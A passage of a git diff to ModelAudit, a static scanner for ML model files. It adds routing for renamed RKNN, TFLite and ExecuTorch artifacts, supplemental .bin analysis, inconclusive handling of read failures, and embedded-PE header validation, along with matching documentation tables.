diff --git a/CHANGELOG.md b/CHANGELOG.md index af3359aad..601b134dd 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -21,6 +21,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - stop flagging a false-positive ONNX Python operator when tensor weight bytes coincidentally spell `PyOp` - detect Python operators declared in nested ONNX graphs, functions, and function-default graphs - distinguish ASCII-serialized Torch7 artifacts from plain PyTorch source text +- detect and scan signature-valid CNTK and LightGBM payloads even when renamed with misleading suffixes +- detect and scan signature-valid RKNN, TFLite, and ExecuTorch payloads under non-conflicting renamed suffixes while preserving owned routes, and classify unavailable ExecuTorch reads as inconclusive - mark CatBoost text-fragment extraction limits and unavailable reads as inconclusive analysis - mark RKNN and Torch7 string-extraction limits and unavailable reads as inconclusive analysis - classify unavailable TFLite parsing coverage as inconclusive rather than a security finding diff --git a/README.md b/README.md index 94ff2a367..8eeb033f1 100644 --- a/README.md +++ b/README.md @@ -64,38 +64,38 @@ Files scanned: 1 | Issues found: 2 critical, 1 warning ModelAudit includes 44 registered scanners covering model, archive, and configuration formats: -| Format | Extensions | Risk | -| ----------------------- | --------------------------------------------------------------------------------------- | ------ | -| **Pickle** | `.pkl`, `.pickle`, `.dill` | HIGH | -| **PyTorch** | `.pt`, `.pth`, `.ckpt`, `.bin` | HIGH | -| **Joblib** | `.joblib` | HIGH | -| **NumPy** | `.npy`, `.npz` | HIGH | -| **R Serialized** | `.rds`, `.rda`, `.rdata` | HIGH | -| **TensorFlow** | `.pb`, `.meta`, SavedModel dirs | MEDIUM | -| **Keras** | `.h5`, `.hdf5`, `.keras` | MEDIUM | -| **ONNX** | `.onnx` | MEDIUM | -| **CoreML** | `.mlmodel` | LOW | -| **MXNet** | `*-symbol.json`, `*-NNNN.params`, structurally valid renamed symbol JSON | LOW | -| **NeMo** | `.nemo`, renamed archives with root config | MEDIUM | -| **CNTK** | `.dnn`, `.cmf`, signature-valid renamed artifacts | MEDIUM | -| **RKNN** | `.rknn` | MEDIUM | -| **Torch7** | Serialized artifacts (`.t7`, `.th`, `.net` or renamed) | HIGH | -| **CatBoost** | `.cbm` | MEDIUM | -| **XGBoost** | `.bst`, `.model`, `.json`, `.ubj`, extensionless UBJSON | MEDIUM | -| **LightGBM** | `.lgb`, `.lightgbm`, `.model`, signature-valid renamed artifacts | MEDIUM | -| **Llamafile** | Executable wrappers (`.llamafile`, `.exe`, extensionless or renamed) | MEDIUM | -| **TorchServe** | `.mar` | HIGH | -| **SafeTensors** | `.safetensors` | LOW | -| **GGUF/GGML** | `.gguf`, `.ggml`, `.ggmf`, `.ggjt`, `.ggla`, `.ggsa`, signature-valid renamed artifacts | LOW | -| **JAX/Flax** | `.msgpack`, `.flax`, `.orbax`, `.jax`, `.checkpoint`, `.orbax-checkpoint` | LOW | -| **TFLite** | `.tflite` | LOW | -| **ExecuTorch** | `.ptl`, `.pte` | LOW | -| **TensorRT** | `.engine`, `.plan`, `.trt` | LOW | -| **PaddlePaddle** | `.pdmodel`, `.pdiparams` | LOW | -| **OpenVINO** | `.xml` | LOW | -| **Skops** | `.skops` | HIGH | -| **PMML** | `.pmml` | LOW | -| **Compressed Wrappers** | `.gz`, `.bz2`, `.xz`, `.lz4`, `.zlib` | MEDIUM | +| Format | Extensions | Risk | +| ----------------------- | ------------------------------------------------------------------------------------------- | ------ | +| **Pickle** | `.pkl`, `.pickle`, `.dill` | HIGH | +| **PyTorch** | `.pt`, `.pth`, `.ckpt`, `.bin` | HIGH | +| **Joblib** | `.joblib` | HIGH | +| **NumPy** | `.npy`, `.npz` | HIGH | +| **R Serialized** | `.rds`, `.rda`, `.rdata` | HIGH | +| **TensorFlow** | `.pb`, `.meta`, SavedModel dirs | MEDIUM | +| **Keras** | `.h5`, `.hdf5`, `.keras` | MEDIUM | +| **ONNX** | `.onnx` | MEDIUM | +| **CoreML** | `.mlmodel` | LOW | +| **MXNet** | `*-symbol.json`, `*-NNNN.params`, structurally valid renamed symbol JSON | LOW | +| **NeMo** | `.nemo`, renamed archives with root config | MEDIUM | +| **CNTK** | `.dnn`, `.cmf`, signature-valid renamed artifacts | MEDIUM | +| **RKNN** | `.rknn`, signature-valid artifacts under non-conflicting renamed suffixes | MEDIUM | +| **Torch7** | Serialized artifacts (`.t7`, `.th`, `.net` or renamed) | HIGH | +| **CatBoost** | `.cbm` | MEDIUM | +| **XGBoost** | `.bst`, `.model`, `.json`, `.ubj`, extensionless UBJSON | MEDIUM | +| **LightGBM** | `.lgb`, `.lightgbm`, `.model`, signature-valid renamed artifacts | MEDIUM | +| **Llamafile** | Executable wrappers (`.llamafile`, `.exe`, extensionless or renamed) | MEDIUM | +| **TorchServe** | `.mar` | HIGH | +| **SafeTensors** | `.safetensors` | LOW | +| **GGUF/GGML** | `.gguf`, `.ggml`, `.ggmf`, `.ggjt`, `.ggla`, `.ggsa`, signature-valid renamed artifacts | LOW | +| **JAX/Flax** | `.msgpack`, `.flax`, `.orbax`, `.jax`, `.checkpoint`, `.orbax-checkpoint` | LOW | +| **TFLite** | `.tflite`, signature-valid artifacts under non-conflicting renamed suffixes | LOW | +| **ExecuTorch** | `.ptl`, `.pte`, signature-valid standalone artifacts under non-conflicting renamed suffixes | LOW | +| **TensorRT** | `.engine`, `.plan`, `.trt` | LOW | +| **PaddlePaddle** | `.pdmodel`, `.pdiparams` | LOW | +| **OpenVINO** | `.xml` | LOW | +| **Skops** | `.skops` | HIGH | +| **PMML** | `.pmml` | LOW | +| **Compressed Wrappers** | `.gz`, `.bz2`, `.xz`, `.lz4`, `.zlib` | MEDIUM | Plus scanners for ZIP, TAR, 7-Zip, OCI layers, Jinja2 templates, JSON/YAML metadata, manifests, model cards, text files, and RAR recognition. RAR archives are reported as unsupported/fail-closed instead of being skipped. diff --git a/docs/user/compatibility-matrix.md b/docs/user/compatibility-matrix.md index a5f44f25e..8904a8303 100644 --- a/docs/user/compatibility-matrix.md +++ b/docs/user/compatibility-matrix.md @@ -10,37 +10,40 @@ This page shows which model formats work in base install and which require optio ## Matrix -| Format family | Common extensions | Base install | Optional dependency / extra | -| ------------------------------- | --------------------------------------------------------------------------------------- | --------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | -| Pickle family | `.pkl`, `.pickle`, `.dill` | Yes | `modelaudit[dill]` for broader dill compatibility | -| PyTorch archive/binary | `.pt`, `.pth`, `.ckpt`, `.bin` | Yes (static archive/pickle checks) | `modelaudit[pytorch]` optional for broader Torch ecosystem tooling | -| NumPy | `.npy`, `.npz` | Yes | None | -| R serialized | `.rds`, `.rda`, `.rdata` | Yes (static analysis only) | None | -| TensorFlow SavedModel/MetaGraph | `.pb`, `.meta`, SavedModel directories | Yes (vendored protos) | `modelaudit[tensorflow]` on Python 3.11-3.12 for TensorFlow-dependent checkpoint/weight analysis | -| Keras H5 | `.h5`, `.hdf5` | No | `modelaudit[h5]` (required) | -| ONNX | `.onnx` | No | `modelaudit[onnx]` on Python 3.10-3.12 (required) | -| CoreML | `.mlmodel` | Yes (static protobuf/metadata checks) | None | -| NeMo | `.nemo`, renamed archives with root config | Yes (static tar/config analysis, Hydra `_target_` checks) | None | -| CNTK native | `.dnn`, `.cmf`, signature-valid renamed artifacts | Yes (static signature and string analysis) | None | -| RKNN models | `.rknn` | Yes (static bounded metadata checks) | None | -| Torch7 serialized | Serialized artifacts (`.t7`, `.th`, `.net` or renamed) | Yes (static string/structure checks) | None | -| CatBoost native | `.cbm` | Yes (static bounded metadata inspection) | None | -| LightGBM native | `.lgb`, `.lightgbm`, signature-valid `.model` or renamed artifacts | Yes (static native-text/binary checks) | None | -| Llamafile binaries | Executable wrappers (`.llamafile`, `.exe`, extensionless/renamed) | Yes (executable + embedded GGUF checks) | None required | -| TorchServe archives | `.mar` | Yes | None | -| SafeTensors | `.safetensors` | Yes | None required | -| GGUF/GGML | `.gguf`, `.ggml`, `.ggmf`, `.ggjt`, `.ggla`, `.ggsa`, signature-valid renamed artifacts | Yes | None required | -| Flax/JAX msgpack | `.msgpack`, `.flax`, `.orbax`, `.jax` | Yes | None (`modelaudit[flax]` is a compatibility alias) | -| JAX checkpoints | `.ckpt`, `.checkpoint`, `.orbax-checkpoint` | Yes | None | -| TFLite | `.tflite` | No | `modelaudit[tflite]` (required) | -| XGBoost | `.bst`, `.model`, `.json`, `.ubj`, extensionless UBJSON | Yes for static checks on common formats | `modelaudit[xgboost]` recommended for UBJ/full validation paths | -| TensorRT | `.engine`, `.plan`, `.trt` | Yes | None required | -| PaddlePaddle | `.pdmodel`, `.pdiparams` | Yes (static byte-pattern checks) | None required | -| MXNet | `*-symbol.json`, `*-NNNN.params` | Yes (static graph + params checks) | None required | -| Standalone compressed wrappers | `.gz`, `.bz2`, `.xz`, `.lz4`, `.zlib` | Yes (safe bounded decompression + inner scan routing) | `lz4` package optional only for `.lz4` payload decompression | -| 7-Zip archives | `.7z` | No | `modelaudit[sevenzip]` (required) | -| RAR archives | `.rar` | Yes (recognized and failed closed as unsupported) | None | -| Archives/config/text | `.zip`, `.tar*`, `.json`, `.yaml`, `.yml`, `.toml`, `.md`, `.txt` | Yes | None | +| Format family | Common extensions | Base install | Optional dependency / extra | +| ------------------------------- | ------------------------------------------------------------------------------------------- | --------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | +| Pickle family | `.pkl`, `.pickle`, `.dill` | Yes | `modelaudit[dill]` for broader dill compatibility | +| PyTorch archive/binary | `.pt`, `.pth`, `.ckpt`, `.bin` | Yes (static archive/pickle checks) | `modelaudit[pytorch]` optional for broader Torch ecosystem tooling | +| NumPy | `.npy`, `.npz` | Yes | None | +| R serialized | `.rds`, `.rda`, `.rdata` | Yes (static analysis only) | None | +| TensorFlow SavedModel/MetaGraph | `.pb`, `.meta`, SavedModel directories | Yes (vendored protos) | `modelaudit[tensorflow]` on Python 3.11-3.12 for TensorFlow-dependent checkpoint/weight analysis | +| Keras H5 | `.h5`, `.hdf5` | No | `modelaudit[h5]` (required) | +| ONNX | `.onnx` | No | `modelaudit[onnx]` on Python 3.10-3.12 (required) | +| CoreML | `.mlmodel` | Yes (static protobuf/metadata checks) | None | +| NeMo | `.nemo`, renamed archives with root config | Yes (static tar/config analysis, Hydra `_target_` checks) | None | +| CNTK native | `.dnn`, `.cmf`, signature-valid renamed artifacts | Yes (static signature and string analysis) | None | +| RKNN models | `.rknn`, signature-valid artifacts under non-conflicting renamed suffixes | Yes (static bounded metadata checks) | None | +| Torch7 serialized | Serialized artifacts (`.t7`, `.th`, `.net` or renamed) | Yes (static string/structure checks) | None | +| CatBoost native | `.cbm` | Yes (static bounded metadata inspection) | None | +| LightGBM native | `.lgb`, `.lightgbm`, signature-valid `.model` or renamed artifacts | Yes (static native-text/binary checks) | None | +| Llamafile binaries | Executable wrappers (`.llamafile`, `.exe`, extensionless/renamed) | Yes (executable + embedded GGUF checks) | None required | +| TorchServe archives | `.mar` | Yes | None | +| SafeTensors | `.safetensors` | Yes | None required | +| GGUF/GGML | `.gguf`, `.ggml`, `.ggmf`, `.ggjt`, `.ggla`, `.ggsa`, signature-valid renamed artifacts | Yes | None required | +| Flax/JAX msgpack | `.msgpack`, `.flax`, `.orbax`, `.jax` | Yes | None (`modelaudit[flax]` is a compatibility alias) | +| JAX checkpoints | `.ckpt`, `.checkpoint`, `.orbax-checkpoint` | Yes | None | +| TFLite | `.tflite`, signature-valid artifacts under non-conflicting renamed suffixes | No | `modelaudit[tflite]` (required) | +| ExecuTorch | `.ptl`, `.pte`, signature-valid standalone artifacts under non-conflicting renamed suffixes | Yes (static binary/archive checks) | None | +| XGBoost | `.bst`, `.model`, `.json`, `.ubj`, extensionless UBJSON | Yes for static checks on common formats | `modelaudit[xgboost]` recommended for UBJ/full validation paths | +| TensorRT | `.engine`, `.plan`, `.trt` | Yes | None required | +| PaddlePaddle | `.pdmodel`, `.pdiparams` | Yes (static byte-pattern checks) | None required | +| MXNet | `*-symbol.json`, `*-NNNN.params` | Yes (static graph + params checks) | None required | +| Standalone compressed wrappers | `.gz`, `.bz2`, `.xz`, `.lz4`, `.zlib` | Yes (safe bounded decompression + inner scan routing) | `lz4` package optional only for `.lz4` payload decompression | +| 7-Zip archives | `.7z` | No | `modelaudit[sevenzip]` (required) | +| RAR archives | `.rar` | Yes (recognized and failed closed as unsupported) | None | +| Archives/config/text | `.zip`, `.tar*`, `.json`, `.yaml`, `.yml`, `.toml`, `.md`, `.txt` | Yes | None | + +Renamed RKNN and standalone ExecuTorch routing does not override `.pb` or `.meta`; renamed TFLite routing also preserves other format-owned suffixes. Signature-valid `.bin` artifacts retain raw-binary checks and receive applicable format-specific analysis. ## Notes diff --git a/modelaudit/core.py b/modelaudit/core.py index d9b3958e8..f90d39401 100644 --- a/modelaudit/core.py +++ b/modelaudit/core.py @@ -30,6 +30,7 @@ def shared_source_sensitive_caches() -> Iterator[None]: from modelaudit.scanner_results import Issue, IssueSeverity, ScanResult from modelaudit.scanner_selection import ( SCANNER_SELECTION_PREFERRED_KIND, + ScannerSelectionPolicy, add_scanner_selection_skip_check, make_scanner_selection_skip_result, normalize_scanner_selection_config, @@ -62,6 +63,7 @@ def shared_source_sensitive_caches() -> Iterator[None]: detect_file_format_from_magic, detect_format_from_extension, detect_mxnet_symbol_content_route, + detect_pytorch_binary_supplemental_format, detect_xgboost_ubjson_content_route, is_executorch_archive, is_keras_zip_archive, @@ -244,6 +246,42 @@ def _select_preferred_scanner_id(path: str, header_format: str, ext: str) -> str return _registry.get_scanner_id_for_header_format(header_format) +def _merge_pytorch_binary_supplemental_analysis( + path: str, + result: ScanResult, + config: dict[str, Any], + scanner_selection: ScannerSelectionPolicy, + supplemental_scanner_id: str | None, +) -> None: + """Merge strict format-specific findings without dropping raw `.bin` checks.""" + if supplemental_scanner_id is None: + return + if not scanner_selection.allows(supplemental_scanner_id): + add_scanner_selection_skip_check( + result, + path, + supplemental_scanner_id, + scanner_selection, + context="supplemental .bin content analysis", + ) + return + + scanner_class = _registry.load_scanner_by_id(supplemental_scanner_id) + if scanner_class is None: + supplemental_result = _make_unavailable_recognized_format_result( + path, + supplemental_scanner_id, + supplemental_scanner_id, + ) + else: + supplemental_result = scanner_class(config=config).scan(path) + + primary_bytes_scanned = result.bytes_scanned + result.merge(supplemental_result) + result.bytes_scanned = max(primary_bytes_scanned, supplemental_result.bytes_scanned) + result.metadata.setdefault("supplemental_scanners", []).append(supplemental_scanner_id) + + def _is_direct_header_route(scanner_id: str, header_format: str) -> bool: """Return whether the detected header directly maps to this scanner.""" return header_format != "unknown" and HEADER_FORMAT_TO_SCANNER_ID.get(header_format) == scanner_id @@ -1677,6 +1715,9 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan # Prefer scanners based on trusted structure rather than the filename alone. preferred_scanner: type[BaseScanner] | None = None scanner_id = _select_preferred_scanner_id(path, header_format, ext) + pytorch_binary_supplemental_scanner_id = ( + detect_pytorch_binary_supplemental_format(path) if ext == ".bin" and header_format == "pytorch_binary" else None + ) skipped_preferred_scanner_id: str | None = None if scanner_id and scanner_selection.allows(scanner_id): preferred_scanner = _registry.load_scanner_by_id(scanner_id) @@ -1746,10 +1787,18 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan result.finish(success=False) else: # Use registry's lazy loading method to avoid loading all scanners - scanner_class = _registry.get_scanner_for_path( - path, - scanner_selection=scanner_selection if scanner_selection.active else None, - ) + scanner_class = None + if ( + skipped_preferred_scanner_id == "pytorch_binary" + and pytorch_binary_supplemental_scanner_id is not None + and scanner_selection.allows(pytorch_binary_supplemental_scanner_id) + ): + scanner_class = _registry.load_scanner_by_id(pytorch_binary_supplemental_scanner_id) + if scanner_class is None: + scanner_class = _registry.get_scanner_for_path( + path, + scanner_selection=scanner_selection if scanner_selection.active else None, + ) if scanner_class: logger.debug(f"Using {scanner_class.name} scanner for {path}") scanner = scanner_class(config=config) @@ -1847,6 +1896,15 @@ def _scan_file_internal(path: str, config: dict[str, Any] | None = None) -> Scan if is_xgboost_pickle_spoof: _mark_xgboost_pickle_extension_spoof(result, path, ext) + if ext == ".bin" and header_format == "pytorch_binary" and result.scanner_name == "pytorch_binary": + _merge_pytorch_binary_supplemental_analysis( + path, + result, + config, + scanner_selection, + pytorch_binary_supplemental_scanner_id, + ) + if discrepancy_msg: # Determine severity based on whether it's a validation failure or just a discrepancy severity = IssueSeverity.WARNING if not file_type_valid else IssueSeverity.DEBUG diff --git a/modelaudit/scanner_registry_metadata.py b/modelaudit/scanner_registry_metadata.py index 7cf8b678a..7555d6916 100644 --- a/modelaudit/scanner_registry_metadata.py +++ b/modelaudit/scanner_registry_metadata.py @@ -340,7 +340,6 @@ "class": "TFLiteScanner", "description": "Scans TensorFlow Lite model files", "extensions": [".tflite"], - "content_routed_extensions": [".bin"], "priority": 2, "dependencies": ["tflite"], "numpy_sensitive": True, diff --git a/modelaudit/scanners/archive_dispatch.py b/modelaudit/scanners/archive_dispatch.py index 529ea6e95..523e5cd35 100644 --- a/modelaudit/scanners/archive_dispatch.py +++ b/modelaudit/scanners/archive_dispatch.py @@ -27,6 +27,7 @@ detect_file_format, detect_file_format_from_magic, detect_mxnet_symbol_content_route, + detect_pytorch_binary_supplemental_format, detect_xgboost_ubjson_content_route, is_executorch_archive, is_keras_zip_archive, @@ -105,6 +106,45 @@ def _is_direct_header_route(scanner_id: str, header_format: str) -> bool: return header_format != "unknown" and _HEADER_FORMAT_TO_SCANNER_ID.get(header_format) == scanner_id +def _merge_pytorch_binary_supplemental_analysis( + path: str, + result: ScanResult, + config: dict[str, Any] | None, + supplemental_scanner_id: str | None, +) -> None: + """Merge strict nested `.bin` format analysis without dropping raw checks.""" + if supplemental_scanner_id is None: + return + + from . import _registry + + scanner_selection = policy_from_config(config) + if not scanner_selection.allows(supplemental_scanner_id): + add_scanner_selection_skip_check( + result, + path, + supplemental_scanner_id, + scanner_selection, + context="supplemental nested .bin content analysis", + ) + return + + scanner_class = _registry.load_scanner_by_id(supplemental_scanner_id) + if scanner_class is None: + supplemental_result = _make_unavailable_recognized_format_result( + path, + supplemental_scanner_id, + supplemental_scanner_id, + ) + else: + supplemental_result = scanner_class(config=config).scan(path) + + primary_bytes_scanned = result.bytes_scanned + result.merge(supplemental_result) + result.bytes_scanned = max(primary_bytes_scanned, supplemental_result.bytes_scanned) + result.metadata.setdefault("supplemental_scanners", []).append(supplemental_scanner_id) + + def _nested_scanner_can_handle( scanner_class: type[Any], scanner_id: str, @@ -484,6 +524,11 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes header_format_override = trusted_content_format if trusted_content_format in {"mxnet", "xgboost"} else None scanner_id = _select_nested_scanner_id(path, header_format_override) + pytorch_binary_supplemental_scanner_id = ( + detect_pytorch_binary_supplemental_format(path) + if os.path.splitext(path)[1].lower() == ".bin" and scanner_id == "pytorch_binary" + else None + ) skipped_preferred_scanner_id: str | None = None if scanner_id and scanner_selection.allows(scanner_id): scanner_class = _registry.load_scanner_by_id(scanner_id) @@ -498,9 +543,15 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes skipped_preferred_scanner_id = scanner_id if scanner_class is None: - if scanner_selection.active: + if ( + skipped_preferred_scanner_id == "pytorch_binary" + and pytorch_binary_supplemental_scanner_id is not None + and scanner_selection.allows(pytorch_binary_supplemental_scanner_id) + ): + scanner_class = _registry.load_scanner_by_id(pytorch_binary_supplemental_scanner_id) + if scanner_class is None and scanner_selection.active: scanner_class = _registry.get_scanner_for_path(path, scanner_selection=scanner_selection) - else: + elif scanner_class is None: scanner_class = _registry.get_scanner_for_path(path) if scanner_class is None: @@ -545,4 +596,11 @@ def scan_nested_file(path: str, config: dict[str, Any] | None = None) -> ScanRes context="preferred nested scanner", kind=SCANNER_SELECTION_PREFERRED_KIND, ) + if scanner_id == "pytorch_binary" and result.scanner_name == "pytorch_binary": + _merge_pytorch_binary_supplemental_analysis( + path, + result, + config, + pytorch_binary_supplemental_scanner_id, + ) return result diff --git a/modelaudit/scanners/executorch_scanner.py b/modelaudit/scanners/executorch_scanner.py index a594e1aed..46001af4f 100644 --- a/modelaudit/scanners/executorch_scanner.py +++ b/modelaudit/scanners/executorch_scanner.py @@ -5,6 +5,7 @@ import zipfile from typing import Any, BinaryIO, ClassVar, cast +from ..scanner_results import mark_inconclusive_scan_result from ..scanner_selection import add_scanner_selection_skip_check, embedded_pickle_scanner from ..utils import sanitize_archive_path from ..utils.file.detection import ( @@ -18,6 +19,8 @@ apply_pickle_member_context, ) +CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset({".bin", ".meta", ".pb"}) + class ExecuTorchScanner(BaseScanner): """Scanner for PyTorch Mobile/ExecuTorch archives (.ptl, .pte).""" @@ -37,15 +40,40 @@ def can_handle(cls, path: str) -> bool: ext = os.path.splitext(path)[1].lower() if ext in cls.supported_extensions: return True - return is_executorch_archive(path) + if ext in CONTENT_ROUTE_BLOCKED_EXTENSIONS: + return False + try: + header = cls._read_header(path, length=8) + except OSError: + return False + return (_is_executorch_binary_signature(header) and _is_valid_executorch_binary(path)) or is_executorch_archive( + path + ) @staticmethod def _read_header(path: str, length: int = 4) -> bytes: - try: - with open(path, "rb") as f: - return f.read(length) - except Exception: - return b"" + with open(path, "rb") as f: + return f.read(length) + + @staticmethod + def _finish_read_failure(result: ScanResult, path: str, exc: OSError) -> ScanResult: + mark_inconclusive_scan_result(result, "executorch_read_failed") + result.add_check( + name="ExecuTorch File Read", + passed=False, + message=f"Unable to read ExecuTorch content: {exc!s}", + severity=IssueSeverity.INFO, + location=path, + details={ + "exception": str(exc), + "exception_type": type(exc).__name__, + "analysis_incomplete": True, + "scan_outcome_reason": "executorch_read_failed", + }, + rule_code="S902", + ) + result.finish(success=False) + return result def scan(self, path: str) -> ScanResult: path_check_result = self._check_path(path) @@ -60,8 +88,14 @@ def scan(self, path: str) -> ScanResult: file_size = self.get_file_size(path) result.metadata["file_size"] = file_size - header = self._read_header(path, length=8) - valid_binary_program = _is_executorch_binary_signature(header) and _is_valid_executorch_binary(path) + try: + header = self._read_header(path, length=8) + valid_binary_program = _is_executorch_binary_signature(header) and _is_valid_executorch_binary( + path, + propagate_io_errors=True, + ) + except OSError as exc: + return self._finish_read_failure(result, path, exc) if valid_binary_program: result.add_check( name="ExecuTorch Binary Format Validation", @@ -71,10 +105,12 @@ def scan(self, path: str) -> ScanResult: details={"path": path, "format": "executorch_binary"}, ) - try: - should_scan_archive = header.startswith(b"PK") or zipfile.is_zipfile(path) - except OSError: - should_scan_archive = header.startswith(b"PK") + should_scan_archive = header.startswith(b"PK") + if not should_scan_archive: + try: + should_scan_archive = zipfile.is_zipfile(path) + except OSError as exc: + return self._finish_read_failure(result, path, exc) if valid_binary_program and not should_scan_archive: result.bytes_scanned = file_size @@ -174,6 +210,8 @@ def scan(self, path: str) -> ScanResult: ) result.finish(success=False) return result + except OSError as exc: + return self._finish_read_failure(result, path, exc) except Exception as e: # pragma: no cover - unexpected errors result.add_check( name="ExecuTorch File Scan", diff --git a/modelaudit/scanners/pytorch_binary_scanner.py b/modelaudit/scanners/pytorch_binary_scanner.py index 6a8b6af99..4a9d8c7c1 100644 --- a/modelaudit/scanners/pytorch_binary_scanner.py +++ b/modelaudit/scanners/pytorch_binary_scanner.py @@ -318,6 +318,33 @@ def _verify_shebang_context(self, data: bytes, offset_in_chunk: int) -> bool: return False + def _is_valid_embedded_pe(self, data: bytes, offset_in_chunk: int, absolute_offset: int) -> bool: + """Validate a non-leading DOS header before reporting embedded PE content.""" + pointer_offset = offset_in_chunk + 0x3C + if pointer_offset + 4 <= len(data): + pe_pointer = data[pointer_offset : pointer_offset + 4] + else: + try: + with open(self.current_file_path, "rb") as f: + f.seek(absolute_offset + 0x3C) + pe_pointer = f.read(4) + except OSError: + return False + if len(pe_pointer) != 4: + return False + pe_offset = int.from_bytes(pe_pointer, "little") + if pe_offset < 0x40: + return False + signature_offset = offset_in_chunk + pe_offset + if signature_offset + 4 <= len(data): + return data[signature_offset : signature_offset + 4] == b"PE\x00\x00" + try: + with open(self.current_file_path, "rb") as f: + f.seek(absolute_offset + pe_offset) + return f.read(4) == b"PE\x00\x00" + except OSError: + return False + def _check_for_executable_signatures( self, chunk: bytes, @@ -325,7 +352,10 @@ def _check_for_executable_signatures( offset: int, ) -> None: """Check for executable file signatures with context-aware detection""" - from modelaudit.utils.helpers.ml_context import analyze_binary_for_ml_context + from modelaudit.utils.helpers.ml_context import ( + analyze_binary_for_ml_context, + should_ignore_executable_signature, + ) # RULE 1: Only scan first 64KB - real executables have signatures at start if offset > 65536: @@ -374,9 +404,19 @@ def _check_for_executable_signatures( ignored_count += 1 continue # Skip - not a real shebang - # For other signatures, check if it's in weight data - # High ML weight confidence means it's likely coincidental - if ml_context.get("weight_confidence", 0) > 0.7: + # Middle-of-file MZ pairs are common in weights; retain only + # structurally validated embedded PE images. + if sig == b"MZ" and pos != 0 and not self._is_valid_embedded_pe(chunk, pos - offset, pos): + ignored_count += 1 + continue + + if should_ignore_executable_signature( + sig, + pos, + ml_context, + pattern_density, + len(positions), + ): ignored_count += 1 continue diff --git a/modelaudit/scanners/rknn_scanner.py b/modelaudit/scanners/rknn_scanner.py index 5717642cf..d46671439 100644 --- a/modelaudit/scanners/rknn_scanner.py +++ b/modelaudit/scanners/rknn_scanner.py @@ -1,11 +1,10 @@ -"""Scanner for Rockchip RKNN model artifacts (.rknn).""" +"""Scanner for Rockchip RKNN model artifacts.""" from __future__ import annotations import ipaddress import os import re -from pathlib import Path from typing import Any, ClassVar from ..scanner_results import INCONCLUSIVE_SCAN_OUTCOME, mark_inconclusive_scan_result @@ -18,6 +17,7 @@ MAX_SIGNATURE_BYTES = 64 MAX_SCAN_BYTES = 12 * 1024 * 1024 MAX_EXTRACTED_STRINGS = 4000 +CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset({".bin", ".meta", ".pb"}) PRINTABLE_TEXT_PATTERN = re.compile(rb"[ -~]{6,512}") ABSOLUTE_PATH_PATTERN = re.compile(r"^(?:[a-zA-Z]:[\\/]|/|~)") @@ -70,7 +70,7 @@ class RknnScanner(BaseScanner): """Static scanner for RKNN models.""" name = "rknn" - description = "Scans RKNN .rknn model files for suspicious metadata references and command/network indicators" + description = "Scans RKNN model files for suspicious metadata references and command/network indicators" supported_extensions: ClassVar[list[str]] = [".rknn"] def __init__(self, config: dict[str, Any] | None = None) -> None: @@ -86,7 +86,7 @@ def _has_rknn_signature(prefix: bytes) -> bool: def can_handle(cls, path: str) -> bool: if not os.path.isfile(path): return False - if Path(path).suffix.lower() not in cls.supported_extensions: + if os.path.splitext(path)[1].lower() in CONTENT_ROUTE_BLOCKED_EXTENSIONS: return False try: diff --git a/modelaudit/scanners/tflite_scanner.py b/modelaudit/scanners/tflite_scanner.py index cbf8eb079..11d19a061 100644 --- a/modelaudit/scanners/tflite_scanner.py +++ b/modelaudit/scanners/tflite_scanner.py @@ -19,6 +19,24 @@ _TFLITE_MAGIC_SIZE = 4 _TFLITE_MIN_HEADER_SIZE = _TFLITE_MAGIC_OFFSET + _TFLITE_MAGIC_SIZE _TFLITE_MAGIC_BYTES = b"TFL3" +_CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset( + { + ".bin", + ".cmf", + ".dnn", + ".exe", + ".lgb", + ".lightgbm", + ".llamafile", + ".meta", + ".model", + ".net", + ".pb", + ".rknn", + ".t7", + ".th", + } +) TFLITE_MAGIC_INCONCLUSIVE_REASON = "tflite_magic_validation_failed" TFLITE_PARSE_INCONCLUSIVE_REASON = "tflite_parse_incomplete" TFLITE_STRUCTURE_INCONCLUSIVE_REASON = "tflite_structure_validation_failed" @@ -55,8 +73,11 @@ def can_handle(cls, path: str) -> bool: if not os.path.isfile(path): return False - if os.path.splitext(path)[1].lower() in cls.supported_extensions: + ext = os.path.splitext(path)[1].lower() + if ext in cls.supported_extensions: return True + if ext in _CONTENT_ROUTE_BLOCKED_EXTENSIONS: + return False try: with open(path, "rb") as f: diff --git a/modelaudit/scanners/torch7_scanner.py b/modelaudit/scanners/torch7_scanner.py index b1fb29c36..d298cb17a 100644 --- a/modelaudit/scanners/torch7_scanner.py +++ b/modelaudit/scanners/torch7_scanner.py @@ -15,6 +15,7 @@ MAX_SCAN_BYTES = 12 * 1024 * 1024 MAX_EXTRACTED_STRINGS = 5000 MIN_TORCH7_SIZE = 8 +CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset({".bin", ".meta", ".pb"}) PRINTABLE_TEXT_PATTERN = re.compile(rb"[\t\n\r -~]{6,512}") @@ -66,9 +67,11 @@ def __init__(self, config: dict[str, Any] | None = None) -> None: @classmethod def can_handle(cls, path: str) -> bool: - """Recognize Torch7 by bounded serialized-content markers, regardless of suffix.""" + """Recognize Torch7 content unless a conflicting suffix retains primary ownership.""" if not os.path.isfile(path): return False + if os.path.splitext(path)[1].lower() in CONTENT_ROUTE_BLOCKED_EXTENSIONS: + return False try: if os.path.getsize(path) < MIN_TORCH7_SIZE: diff --git a/modelaudit/utils/file/detection.py b/modelaudit/utils/file/detection.py index 0de0803fa..33fa8f786 100644 --- a/modelaudit/utils/file/detection.py +++ b/modelaudit/utils/file/detection.py @@ -1110,6 +1110,58 @@ def _looks_like_tflite_header(header: bytes) -> bool: ) +_RENAMED_BINARY_CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset({".bin", ".meta", ".pb"}) +_TFLITE_CONTENT_ROUTE_BLOCKED_EXTENSIONS = frozenset( + { + ".bin", + ".cmf", + ".dnn", + ".exe", + ".lgb", + ".lightgbm", + ".llamafile", + ".meta", + ".model", + ".net", + ".pb", + ".rknn", + ".t7", + ".th", + } +) + + +def 